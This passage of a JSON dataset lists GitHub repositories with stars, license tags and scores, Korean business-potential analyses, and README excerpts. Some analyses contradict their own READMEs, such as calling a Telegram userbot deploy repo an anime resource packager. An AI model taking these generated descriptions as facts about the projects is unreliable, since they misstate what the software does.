的一些内容:\n\n* [Python 基础](https://mofanpy.com/tutorials/python-basic/)\n  * [基础](https://mofanpy.com/tutorials/python-basic/basic/)\n  * [多线程 threading](https://mofanpy.com/tutorials/python-basic/threading/)\n  * [多进程 multiprocessing](https://mofanpy.com/tutorials/python-basic/multiprocessing/)\n  * [简单窗口 tkinter](https://mofanpy.com/tutorials/python-basic/tkinter/)\n* [机器学习](https://mofanpy.com/tutorials/machine-learning/)\n  * [有趣的机器学习](https://mofanpy.com/tutorials/machine-learning/ML-intro/)\n  * [强化学习 (Reinforcement Learning)](https://mofanpy.com/tutorials/machine-learning/reinforcement-learning/)\n  * [进化算法 (Evolutionary Algorithm) 如遗传算法等](https://mofanpy.com/tut","composite_score":0.7,"license_safety_tag":"safe"},{"name":"PanJiaChen/vueAdmin-template","github_url":"https://github.com/PanJiaChen/vueAdmin-template","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":25,"description":"# vueAdmin-template 분석 리포트\n\n## 왜 보물인가\n기업이나 조직에서 사용하는 관리자 화면을 빠르게 만들 수 있는 기성품 틀이다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사 데이터를 관리하는 대시보드 화면이 필요한 클라우드 서비스에 기초 틀로 활용\n2. **내부 업무 도구**: 회사 직원들이 사용하는 직원 관리, 매출 ","readme_excerpt":"# vue-admin-template\n\nEnglish | [简体中文](./README-zh.md)\n\n> A minimal vue admin template with Element UI & axios & iconfont & permission control & lint\n\n**Live demo:** http://panjiachen.github.io/vue-admin-template\n\n\n**The current version is `v4.0+` build on `vue-cli`. If you want to use the old version , you can switch branch to [tag/3.11.0](https://github.com/PanJiaChen/vue-admin-template/tree/tag/3.11.0), it does not rely on `vue-cli`**\n\n<p align=\"center\">\n  <b>SPONSORED BY</b>\n</p>\n<p align=\"center\">\n   <a href=\"https://finclip.com?from=vue_element\" title=\"FinClip\" target=\"_blank\">\n      <img height=\"200px\" src=\"https://gitee.com/panjiachen/gitee-cdn/raw/master/vue%E8%B5%9E%E5%8A%A9.png\" title=\"FinClip\">\n   </a>\n</p>\n\n## Build Setup\n\n```bash\n# clone the project\ngit clone https://github.com/PanJiaChen/vue-admin-template.git\n\n# enter the project directory\ncd vue-admin-template\n\n# install dependency\nnpm install\n\n# develop\nnpm run dev\n```\n\nThis will automatically open http://localhost:95","composite_score":0.7,"license_safety_tag":"safe"},{"name":"ruicky/jd_sign_bot","github_url":"https://github.com/ruicky/jd_sign_bot","stars":8,"language":"","license":"unknown","abandonment_months":57,"description":"# jd_sign_bot 상용화 분석\n\n## 왜 보물인가\n온라인 쇼핑몰에서 매일 반복되는 출석 체크나 적립금 수집을 자동으로 처리해주는 봇으로, 시간을 아끼려는 소비자들에게 유용한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"자동 적립금 수집 앱\" - 월 이용료를 받고 사용자 계정에 자동 로그인하여 적립금을 모아주는 웹/앱 서비스","readme_excerpt":"Bye!\n","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"docker/labs","github_url":"https://github.com/docker/labs","stars":5,"language":"PHP","license":"Apache-2.0","abandonment_months":34,"description":"# docker/labs 저장소 분석\n\n## 왜 보물인가\nDocker(컨테이너 기술의 표준)의 공식 학습 자료로, 초보자부터 전문가까지 실제 프로젝트를 통해 배울 수 있는 실무 중심의 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 플랫폼**: Docker 학습 커리큘럼을 제공하는 SaaS(예: 온라인 개발자 교육 사이트)로 운영\n2. *","readme_excerpt":"# Docker Tutorials and Labs\n\n> At this time we are not actively adding labs to this repository. Our focus is on [training.play-with-docker.com](https://training.play-with-docker.com) where new lab and workshop oriented content is being added. We welcome fixes to existing content. For any new content you wish to contribute, please use this repository:[https://github.com/play-with-docker/play-with-docker.github.io](https://github.com/play-with-docker/play-with-docker.github.io).\n\n\nThis repo contains [Docker](https://docker.com) labs and tutorials authored both by Docker, and by members of the community. We welcome contributions and want to grow the repo.\n\n#### Docker tutorials:\n* [Docker for beginners](beginner/readme.md)\n* [Docker Swarm Mode](swarm-mode/README.md)\n* [Configuring developer tools and programming languages](developer-tools/README.md)\n  * Java\n    * [Live Debugging Java with Docker](developer-tools/java-debugging)\n    * [Docker for Java Developers](developer-tools/java/)\n  ","composite_score":0.7,"license_safety_tag":"safe"},{"name":"donnemartin/data-science-ipython-notebooks","github_url":"https://github.com/donnemartin/data-science-ipython-notebooks","stars":10,"language":"Python","license":"NOASSERTION","abandonment_months":27,"description":"# donnemartin/data-science-ipython-notebooks 분석\n\n## 왜 보물인가\n데이터 분석과 인공지능을 배우고 싶은 사람들을 위해 실제 코드 예제를 모아놓은 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 입문자를 위한 온라인 학습 플랫폼으로 만들어 월 구독료 받기\n2. **내부 업무 ","readme_excerpt":"<br/>\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/README_1200x800.gif\">\n</p>\n\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/coversmall_alt.png\">\n  <br/>\n</p>\n\n# data-science-ipython-notebooks\n\n## Index\n\n* [deep-learning](#deep-learning)\n    * [tensorflow](#tensor-flow-tutorials)\n    * [theano](#theano-tutorials)\n    * [keras](#keras-tutorials)\n    * [caffe](#deep-learning-misc)\n* [scikit-learn](#scikit-learn)\n* [statistical-inference-scipy](#statistical-inference-scipy)\n* [pandas](#pandas)\n* [matplotlib](#matplotlib)\n* [numpy](#numpy)\n* [python-data](#python-data)\n* [kaggle-and-business-analyses](#kaggle-and-business-analyses)\n* [spark](#spark)\n* [mapreduce-python](#mapreduce-python)\n* [amazon web services](#aws)\n* [command lines](#commands)\n* [misc](#misc)\n* [notebook-installation](#notebook-installation)\n* [credits](#credits)\n* [con","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"kubernetes/charts","github_url":"https://github.com/kubernetes/charts","stars":14,"language":"Go","license":"Apache-2.0","abandonment_months":52,"description":"# Kubernetes/Charts 저장소 분석\n\n## 왜 보물인가\n클라우드 서비스를 운영하는 기업들이 복잡한 소프트웨어 설치를 자동화하는 데 필요한 표준 설정 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 애플리케이션 배포 자동화 플랫폼으로 고객사의 설치 시간을 80% 단축\n2. **내부 업무 도구**: 대규모 IT ","readme_excerpt":"|![](https://upload.wikimedia.org/wikipedia/commons/thumb/1/17/Warning.svg/156px-Warning.svg.png) | This project is no longer supported.\n|---|---|\n\n# Helm Charts\n\nThe canonical source for Helm charts is the [Artifact Hub](https://artifacthub.io), an aggregator for distributed chart repos.\n\nThis GitHub project is the source for Helm `stable` and `incubator` [Helm chart repositories](https://v3.helm.sh/docs/topics/chart_repository/). This is now an archive no longer under active development.\n\nFor more information about installing and using Helm, see the\n[Helm Docs](https://helm.sh/docs/). For a quick introduction to Charts, see the [Chart Guide](https://helm.sh/docs/topics/charts/).\n\n## ⚠️ Deprecation and Archive Notice\n\nSimilar to the [Helm 2 Support Plan](https://helm.sh/blog/2019-10-22-helm-2150-released/#helm-2-support-plan), this GitHub project has begun transition to a 1 year \"maintenance mode\" (see [Deprecation Timeline](#deprecation-timeline) below). Given the deprecation plan, t","composite_score":0.7,"license_safety_tag":"safe"},{"name":"apache/incubator-mxnet","github_url":"https://github.com/apache/incubator-mxnet","stars":6,"language":"C++","license":"apache-2.0","abandonment_months":31,"description":"# Apache MXNet 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 패턴을 학습하여 자동으로 판단하는 인공지능 기술을 누구나 쉽게 만들 수 있도록 무료로 제공하는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n- **이미지 분석 SaaS**: 고객사의 사진을 자동으로 분류하거나 문제를 찾아주는 웹 서비스\n- **기업 내부 도구**: 대량의 문서나 데이터를","readme_excerpt":"<!--\n  ~ Licensed to the Apache Software Foundation (ASF) under one\n  ~ or more contributor license agreements.  See the NOTICE file\n  ~ distributed with this work for additional information\n  ~ regarding copyright ownership.  The ASF licenses this file\n  ~ to you under the Apache License, Version 2.0 (the\n  ~ \"License\"); you may not use this file except in compliance\n  ~ with the License.  You may obtain a copy of the License at\n  ~\n  ~   http://www.apache.org/licenses/LICENSE-2.0\n  ~\n  ~ Unless required by applicable law or agreed to in writing,\n  ~ software distributed under the License is distributed on an\n  ~ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n  ~ KIND, either express or implied.  See the License for the\n  ~ specific language governing permissions and limitations\n  ~ under the License.\n  ~\n-->\n\n<div align=\"center\">\n  <a href=\"https://mxnet.apache.org/\"><img src=\"https://raw.githubusercontent.com/dmlc/web-data/master/mxnet/image/mxnet_logo_2.png\"></a><br>\n</div>","composite_score":0.7,"license_safety_tag":"safe"},{"name":"Kulbear/deep-learning-coursera","github_url":"https://github.com/Kulbear/deep-learning-coursera","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":85,"description":"# Kulbear/deep-learning-coursera 분석\n\n## 왜 보물인가\n인공지능 기초를 배우고 싶은 초보자가 체계적으로 학습할 수 있도록 정리된 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 인공지능 입문 과정을 제공하는 SaaS 서비스로 월 구독료 수취\n2. **기업 교육 도구**: 직원 AI 리터러시 향","readme_excerpt":"# Deep Learning Specialization on Coursera\n\n**Master Deep Learning, and Break into AI**\n\nInstructor: [Andrew Ng](http://www.andrewng.org/)\n\n## Introduction\n\nThis repo contains all my work for this specialization. All the code base, quiz questions, screenshot, and images, are taken from, unless specified, [Deep Learning Specialization on Coursera](https://www.coursera.org/specializations/deep-learning).\n\n## What I want to say\n\n**VERBOSE CONTENT WARNING: YOU CAN JUMP TO THE NEXT SECTION IF YOU WANT**\n\nAs a CS major student and a long-time self-taught learner, I have completed many CS related MOOCs on Coursera, Udacity, Udemy, and Edx. I do understand the hard time you spend on understanding new concepts and debugging your program. There are discussion forums on most MOOC platforms, however, even a question with detailed description may need some time to be answered. Here I released these solutions, which are **only for your reference purpose**. It may help you to save some time. And I ho","composite_score":0.7,"license_safety_tag":"safe"},{"name":"Mr-confused/nekopack","github_url":"https://github.com/Mr-confused/nekopack","stars":5,"language":"Shell","license":"unknown","abandonment_months":25,"description":"# nekopack 저장소 분석\n\n## 왜 보물인가\n일본 문화 콘텐츠(애니메이션, 게임 등)를 다루는 창작자들이 필요로 하는 리소스 패키징 도구로, 특정 커뮤니티에서 높은 수요가 있을 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **콘텐츠 제작자 구독 서비스**: 일러스트레이터나 게임 개발자를 위한 월정액 리소스 라이브러리 플랫폼\n2. **스튜디오 ","readme_excerpt":"# Catuserbot-heroku\n[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Ftgcatub%2Fnekopack&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://github.com/TgCatUB/nekopack)\n\nThis repo is only for deploying purpose if you want to look into main source code head to [main source](https://github.com/tgcatub/catuserbot) and fork and give star to these repos \n\n## Deploy\n\nTo be safe fork this repo and then press deploy button from the forked repo \n\nFork Deploy is highly recommended\n\n[![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy)\n\n## credits\n   - [@midnightmadwalk](https://t.me/midnightmadwalk)\n   - [@DeletedUser420](https://t.me/DeletedUser420)\n","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"haoel/leetcode","github_url":"https://github.com/haoel/leetcode","stars":8,"language":"C++","license":"unknown","abandonment_months":29,"description":"# haoel/leetcode 저장소 분석\n\n## 왜 보물인가\n코딩 면접에서 자주 출제되는 알고리즘 문제들의 풀이를 모아놓은 교재로, 취업을 준비하는 사람들이 필요로 하는 실전 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 면접 준비 강좌와 함께 실제 풀이 코드를 제공하는 유료 강의 서비스\n2. **기업 채용 교육 도구**:","readme_excerpt":"\nLeetCode\n========\n\n### LeetCode Algorithm\n\n(Notes: \"🔒\" means you need to buy a book from Leetcode)\n\n\n| # | Title | Solution | Difficulty |\n|---| ----- | -------- | ---------- |\n|1946|[Largest Number After Mutating Substring](https://leetcode.com/problems/largest-number-after-mutating-substring/) | [C++](./algorithms/cpp/largestNumberAfterMutatingSubstring/LargestNumberAfterMutatingSubstring.cpp), [Java](./algorithms/java/src/LargestNumberAfterMutatingSubtring/largestNumberAfterMutatingSubstring.java)|Medium|\n|1945|[Sum of Digits of String After Convert](https://leetcode.com/problems/sum-of-digits-of-string-after-convert/) | [C++](./algorithms/cpp/leetcode/sumOfDigitsOfStringAfterConvert/SumOfDigitsOfStringAfterConvert.cpp)|Easy|\n|1935|[Maximum Number of Words You Can Type](https://leetcode.com/problems/maximum-number-of-words-you-can-type/) | [C++](./algorithms/cpp/maximumNumberOfWordsYouCanType/MaximumNumberOfWordsYouCanType.cpp)|Easy|\n|1884|[Egg Drop With 2 Eggs and N Floors](https:","composite_score":0.6972,"license_safety_tag":"unknown"},{"name":"ZahraHeydari/MusicPlayer","github_url":"https://github.com/ZahraHeydari/MusicPlayer","stars":29,"language":"Kotlin","license":"Apache-2.0","abandonment_months":49,"description":"","readme_excerpt":"# Android-Clean-Arch-Room-Koin(MusicPlayer)\n\nA Simple Audio Player Android Application which has been implemented using Clean Architecture alongside MVVM design\nto play (online/offline) songs by running a service in the background and displaying a notification at top of the screen.\n\n\n\n### The flow of player module which implemented:\n\n<br>\n<p align=\"center\">\n  <img src=\"https://github.com/ZahraHeydari/MusicPlayer/blob/master/flow.png\" width=\"600\"/>\n</p>\n<br>\n\n\n\n### The App Scenario:\n\nAfter selecting songs from your device, they will be saved in database and will be displayed in a playlist. Besides when a list item\nis clicked, the song player page is displayed whereas player service is run in the background\nand notification will be displayed at top of the screen.(Clicking on notification has been handled!)\nAlso if you click long on the song item of playlist, it will be removed both from your stored and displayed playlist.\n\n\n<br>\n<p align=\"center\">\n  <img src=\"https://github.com/ZahraHeyd","composite_score":0.697,"license_safety_tag":"safe"},{"name":"safak/youtube","github_url":"https://github.com/safak/youtube","stars":7,"language":"CSS","license":"unknown","abandonment_months":24,"description":"# safak/youtube 저장소 분석\n\n## 왜 보물인가\n유튜브 데이터를 자동으로 수집하고 분석할 수 있는 도구로, 콘텐츠 크리에이터나 마케팅팀이 수동 작업 없이 채널 성과를 추적할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **콘텐츠 분석 SaaS**: 유튜버가 구독하는 웹사이트에서 실시간으로 조회수, 댓글 분석, 경쟁사 채널 모니터링을 제공\n2.","readme_excerpt":"","composite_score":0.6904,"license_safety_tag":"unknown"},{"name":"gdi2290/angular-starter","github_url":"https://github.com/gdi2290/angular-starter","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":32,"description":"# gdi2290/angular-starter 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션을 빠르게 만들 수 있는 기본 틀(템플릿)을 제공하여, 처음부터 모든 것을 설계할 필요 없이 이미 잘 만들어진 구조에서 시작할 수 있다는 점이 가치입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 소프트웨어 회사가 자사의 구독형 업무 관리 도구","readme_excerpt":"# Please use the Angular CLI if you want an angular app\n\n[![taylor swift](https://img.shields.io/badge/secured%20by-taylor%20swift-brightgreen.svg)](https://twitter.com/SwiftOnSecurity)\n[![volkswagen status](https://auchenberg.github.io/volkswagen/volkswargen_ci.svg?v=1)](https://github.com/auchenberg/volkswagen)\n[![Build Status](https://travis-ci.org/gdi2290/angular-starter.svg?branch=master)](https://travis-ci.org/gdi2290/angular-starter)\n[![GitHub version](https://badge.fury.io/gh/gdi2290%2Fangular-starter.svg)](https://badge.fury.io/gh/gdi2290%2Fangular-starter)\n[![Dependency Status](https://david-dm.org/gdi2290/angular-starter.svg)](https://david-dm.org/gdi2290/angular-starter)\n[![Stack Share](http://img.shields.io/badge/tech-stack-0690fa.svg?style=flat)](http://stackshare.io/gdi2290/angular-starter)\n\n<p align=\"center\">\n  <a href=\"https://patrickjs.com\" target=\"_blank\">\n    <img src=\"https://cloud.githubusercontent.com/assets/1016365/26219144/aa986cfa-3bdb-11e7-9f04-7296dc9ae945.p","composite_score":0.6896,"license_safety_tag":"safe"},{"name":"apachecn/AiLearning","github_url":"https://github.com/apachecn/AiLearning","stars":17,"language":"Python","license":"NOASSERTION","abandonment_months":19,"description":"# AiLearning 저장소 분석\n\n## 왜 보물인가\nAI가 제공하는 답변이 정말 맞는지 검증하는 기술로, 기업들이 AI를 신뢰하고 안전하게 사용할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 AI 챗봇 검증 서비스**: 은행·보험사가 고객에게 주는 AI 답변이 정확한지 자동으로 확인\n2. **의료·법률 문서 작성 검증 도구**: 의","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://www.apachecn.org\">\n        <img width=\"200\" src=\"docs/img/logo.jpg\">\n    </a>\n    <br >\n    <a href=\"https://www.apachecn.org/\"><img src=\"https://img.shields.io/badge/%3E-HOME-green.svg\"></a>\n    <a href=\"https://home.apachecn.org/about/\"><img src=\"https://img.shields.io/badge/%3E-ABOUT-green.svg\"></a>\n    <a href=\"mailto:apache@163.com\"><img src=\"https://img.shields.io/badge/%3E-Email-green.svg\"></a>\n</p>\n\n<h1 align=\"center\"><a href=\"https://github.com/apachecn/AiLearning\">AI learning</a></h1>\n\n> 协议：[CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh)\n> \n> 一种新技术一旦开始流行，你要么坐上压路机，要么成为铺路石。——Stewart Brand\n\n* [在线阅读](https://ailearning.apachecn.org)\n* [在线阅读（v1）](https://alv1.apachecn.org/)\n* [QuantLearning](https://qlearn.apachecn.org/#/)\n* [ApacheCN 中文翻译组 713436582](https://qm.qq.com/cgi-bin/qm/qr?k=5u_aAU-YlY3fH-m8meXTJzBEo2boQIUs&jump_from=webapi&authKey=CVZcReMt/vKdTXZBQ8ly+jWncXiSzzWOlrx5hybX5pSrKu6s0fvGX54+vHHlgYNt)\n* [Apa","composite_score":0.6881,"license_safety_tag":"unknown"},{"name":"cnlh/nps","github_url":"https://github.com/cnlh/nps","stars":9,"language":"Go","license":"GPL-3.0","abandonment_months":24,"description":"","readme_excerpt":"\n# NPS\n![](https://img.shields.io/github/stars/ehang-io/nps.svg)   ![](https://img.shields.io/github/forks/ehang-io/nps.svg)\n[![Gitter](https://badges.gitter.im/cnlh-nps/community.svg)](https://gitter.im/cnlh-nps/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n![Release](https://github.com/ehang-io/nps/workflows/Release/badge.svg)\n![GitHub All Releases](https://img.shields.io/github/downloads/ehang-io/nps/total)\n\n[README](https://github.com/ehang-io/nps/blob/master/README.md)|[中文文档](https://github.com/ehang-io/nps/blob/master/README_zh.md)\n\nNPS is a lightweight, high-performance, powerful **intranet penetration** proxy server, with a powerful web management terminal.\n\n\n![image](https://github.com/ehang-io/nps/blob/master/image/web.png?raw=true)\n\n## Feature\n\n- Comprehensive protocol support, compatible with almost all commonly used protocols, such as tcp, udp, http(s), socks5, p2p, http proxy ...\n- Full platform compatibility (linux, windows, macos, Synology, etc.), s","composite_score":0.6867,"license_safety_tag":"restricted"},{"name":"Yixiaohan/show-me-the-code","github_url":"https://github.com/Yixiaohan/show-me-the-code","stars":8,"language":"","license":"MIT","abandonment_months":80,"description":"","readme_excerpt":"## Python 练习册，每天一个小程序 ##\n\n\n#### 说明： ####\n\n- Python 练习册，每天一个小程序。注：将 Python 换成其他语言，大多数题目也适用\n- 不会出现诸如「打印九九乘法表」、「打印水仙花」之类的题目\n- [点此链接，会看到部分题目的代码，仅供参考](https://github.com/Show-Me-the-Code/python)\n- 本文本文由@史江歌（shijiangge@gmail.com  QQ:499065469）根据互联网资料收集整理而成，感谢互联网，感谢各位的分享。鸣谢！本文会不断更新。\n\n> Talk is cheap. Show me the code.--Linus Torvalds\n\n----------\n \n**第 0000 题：** 将你的 QQ 头像（或者微博头像）右上角加上红色的数字，类似于微信未读信息数量那种提示效果。\n类似于图中效果\n\n![头像](http://i.imgur.com/sg2dkuY.png?1)\n\n**第 0001 题：** 做为 Apple Store App 独立开发者，你要搞限时促销，为你的应用**生成激活码**（或者优惠券），使用 Python 如何生成 200 个激活码（或者优惠券）？\n\n**第 0002 题:** 将 0001 题生成的 200 个激活码（或者优惠券）保存到 **MySQL** 关系型数据库中。 \n\n**第 0003 题：** 将 0001 题生成的 200 个激活码（或者优惠券）保存到 **Redis** 非关系型数据库中。 \n\n**第 0004 题：** 任一个英文的纯文本文件，统计其中的单词出现的个数。\n\n**第 0005 题：** 你有一个目录，装了很多照片，把它们的尺寸变成都不大于 iPhone5 分辨率的大小。\n\n**第 0006 题：** 你有一个目录，放了你一个月的日记，都是 txt，为了避免分词的问题，假设内容都是英文，请统计出你认为每篇日记最重要的词。\n\n**第 0007 题：** 有个目录，里面是你自己写过的程序，统计一下你写过多少行代码。包括空行和注释，但是要分别列出来。\n\n**第 0008 题：** 一个HTML文件，找出里面的**正文**。\n\n**第 0009 题：** 一个HTML文件，找出里面的**链接**。\n","composite_score":0.6861,"license_safety_tag":"safe"},{"name":"tzutalin/labelImg","github_url":"https://github.com/tzutalin/labelImg","stars":8,"language":"Python","license":"mit","abandonment_months":24,"description":"# labelImg 상용화 분석\n\n## 왜 보물인가\n사진에 박스를 그려서 물체를 표시하는 간단한 도구인데, 자동차·보안·의료 등 AI 학습에 필수적인 데이터를 만드는 데 전 세계적으로 널리 쓰이고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 라벨링 SaaS 플랫폼**\n- 기업들이 사진에 물체 위치를 표시하는 작업을 온라인에서 대량으로 처리할 수 ","readme_excerpt":".. image:: /readme/images/labelimg.png\n        :target: https://github.com/heartexlabs/label-studio\n\nLabel Studio is a modern, multi-modal data annotation tool\n=======\n\nLabelImg, the popular image annotation tool created by Tzutalin with the help of dozens contributors, is no longer actively being developed and has become part of the Label Studio community. Check out `Label Studio <https://github.com/heartexlabs/label-studio>`__, the most flexible open source data labeling tool for images, text, hypertext, audio, video and time-series data. `Install <https://labelstud.io/guide/install.html>`__ Label Studio and join the `slack community <https://label-studio.slack.com/>`__ to get started.\n\n.. image:: /readme/images/label-studio-1-6-player-screenshot.png\n        :target: https://github.com/heartexlabs/label-studio\n\nAbout LabelImg\n========\n\n.. image:: https://img.shields.io/pypi/v/labelimg.svg\n        :target: https://pypi.python.org/pypi/labelimg\n\n.. image:: https://img.shields.io/github","composite_score":0.6849,"license_safety_tag":"safe"},{"name":"jobbole/awesome-java-cn","github_url":"https://github.com/jobbole/awesome-java-cn","stars":5,"language":"","license":"unknown","abandonment_months":28,"description":"# awesome-java-cn 평가 보고서\n\n## 왜 보물인가\n자바 프로그래밍을 배우거나 실무에서 사용할 때 필요한 좋은 도구들과 학습 자료를 한곳에 모아놓은 가이드북입니다.\n\n## 어디에 쓸 수 있나\n- **개발사 내부 교육 도구**: 신입 개발자가 자바 생태계를 빠르게 이해하도록 돕는 온보딩 자료로 활용\n- **개발 커뮤니티 플랫폼**: 유료 멤버십 ","readme_excerpt":"# Java资源大全中文版\r\n\r\n我想很多程序员应该记得 GitHub 上有一个 Awesome - XXX 系列的资源整理。[awesome-java](https://github.com/akullpp/awesome-java) 就是 akullpp 发起维护的 Java 资源列表，内容包括：构建工具、数据库、框架、模板、安全、代码分析、日志、第三方库、书籍、Java 站点等等。伯乐在线已经把 awesome-java 资源列表翻成中文后发布于 [ImportNew](http://www.importnew.com/14429.html)。\r\n\r\nAwesome 系列虽然挺全，但基本只对收录的资源做了极为简要的介绍，如果有更详细的中文介绍，对相应开发者的帮助会更大。这也是我们发起这个开源项目的初衷。\r\n\r\n* * *\r\n\r\n### 我们要做什么？\r\n\r\n- 基于 awesome-java 资源列表，我们将对各个资源项进行编译整理。\r\n- 整理后的内容，将收录在[伯乐在线资源频道](http://www.importnew.com/)。可参考已整理的内容：\r\n  - 《[OWNER：Java配置文件解决方案](http://www.importnew.com/owner/)》\r\n  - 《[Spring Boot：简化Spring应用初始搭建以及开发过程](http://www.importnew.com/spring-boot/)》\r\n  - 《[SonarQube：开源的代码质量管理工具](http://www.importnew.com/sonarqube/)》\r\n\r\n* * *\r\n\r\n### 如何参与本项目？\r\n\r\n<!-- 从下面的目录来看，本项目的工作量小不了，所以非常期待能有更多程序员一起来参与。\r\n\r\n不过加入前，有几个小要求：\r\n\r\n* 英文还不错，能读懂英文并用自己的话复述；\r\n* 在用 Java；\r\n\r\n如有兴趣，请加 QQ：50872495。加 Q 时请注明「Java大全」 -->\r\n\r\n* * *\r\n\r\n### 如何为列表贡献新资源？\r\n\r\n欢迎大家为列表贡献高质量的新资源，提交PR时请参照以下要求：\r\n\r\n* 请确保推荐的资源自己使用过\r\n* 提交PR时请注明推荐理由\r\n\r\n资源列表管理收到PR请求后，会定期（每周）在微博转发本周","composite_score":0.6847,"license_safety_tag":"unknown"},{"name":"zu1k/proxypool","github_url":"https://github.com/zu1k/proxypool","stars":6,"language":"Go","license":"GPL-3.0","abandonment_months":38,"description":"# zu1k/proxypool 비즈니스 분석\n\n## 왜 보물인가\n인터넷 연결을 우회하거나 익명성이 필요한 사용자들을 위해 안정적인 네트워크 경로를 자동으로 관리해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 수집 업체가 웹사이트 정보를 대량으로 수집할 때 IP 차단을 피하기 위한 중개 서비스로 운영\n2. **내부 업무 도","readme_excerpt":"<h1 align=\"center\">\n  <br>proxypool<br>\n</h1>\n\n<h5 align=\"center\">自动抓取tg频道、订阅地址、公开互联网上的ss、ssr、vmess、trojan节点信息，聚合去重测试可用性后提供节点列表</h5>\n\n<p align=\"center\">\n  <a href=\"https://github.com/zu1k/proxypool/actions\">\n    <img src=\"https://img.shields.io/github/workflow/status/zu1k/proxypool/Go?style=flat-square\" alt=\"Github Actions\">\n  </a>\n  <a href=\"https://goreportcard.com/report/github.com/zu1k/proxypool\">\n    <img src=\"https://goreportcard.com/badge/github.com/zu1k/proxypool?style=flat-square\">\n  </a>\n  <a href=\"https://github.com/zu1k/proxypool/releases\">\n    <img src=\"https://img.shields.io/github/release/zu1k/proxypool/all.svg?style=flat-square\">\n  </a>\n</p>\n\n## 支持\n\n- 支持ss、ssr、vmess、trojan多种类型\n- Telegram频道抓取\n- 订阅地址抓取解析\n- 公开互联网页面模糊抓取\n- 定时抓取自动更新\n- 通过配置文件设置抓取源\n- 自动检测节点可用性\n\n## 安装\n\n### 使用Heroku\n\n点击按钮进入部署页面，填写基本信息然后运行\n\n其中 `DOMAIN` 需要填写为你需要绑定的域名，`CONFIG_FILE` 需要填写你的配置文件路径，配置文件模板见 config/config.yaml 文件\n\n`CF` 开头的选项暂不需要填写，不影响程序运行\n\n[![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://h","composite_score":0.6778,"license_safety_tag":"restricted"},{"name":"Jrohy/multi-v2ray","github_url":"https://github.com/Jrohy/multi-v2ray","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":27,"description":"# Jrohy/multi-v2ray 자산 분석\n\n## 왜 보물인가\n여러 개의 인터넷 연결 경로를 한 번에 관리할 수 있는 도구로, 인터넷 접속이 제한된 지역에서 자유로운 온라인 활동을 원하는 사람들에게 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개인용 VPN 관리 SaaS 서비스**\n일반 사용자가 복잡한 설정 없이 클릭만으로 여러 연결 경","readme_excerpt":"# multi-v2ray\nV2ray/Xray多用户管理脚本，向导式管理[新增|删除|修改]传输协议  \n![](https://img.shields.io/pypi/v/v2ray-util.svg) \n[![Downloads](https://pepy.tech/badge/v2ray-util)](https://pepy.tech/project/v2ray-util)\n[![Downloads](https://pepy.tech/badge/v2ray-util/month)](https://pepy.tech/project/v2ray-util)\n![](https://img.shields.io/docker/pulls/jrohy/v2ray.svg)\n![](https://img.shields.io/github/license/Jrohy/multi-v2ray.svg)\n\n## [中文](README.md)  [English](README_EN.md)\n\n## 特色\n- [x] 支持Xray管理, v2ray和xray相互独立, 不同命令(v2ray/xray)进入不同的core管理\n- [x] 调用v2ray官方api进行流量统计\n- [x] **多用户, 多端口管理**, 混合传输协议管理不再是梦\n- [x] 首次安装时产生随机端口，默认配置mkcp + 随机一种 (srtp | wechat-video | utp | dtls | wireguard) header伪装;  \n  安装完成显示配置信息;\n- [x] 查看配置信息显示vmess/vless字符串(v2rayN的分享链接格式)\n- [x] 生成**Telegram**的socks5/MTProto分享链接, 支持socks5 + tls组合\n- [x] 支持http/2, 随机生成伪装h2 path\n- [x] 开启关闭tcpFastOpen\n- [x] 直接开启[CDN](https://github.com/Jrohy/multi-v2ray/wiki/CloudFlare-cdn%E4%BB%A3%E7%90%86v2ray%E6%B5%81%E9%87%8F)\n- [x] 开启关闭动态端口\n- [x] 定时更新v2ray(需手动开启)\n- 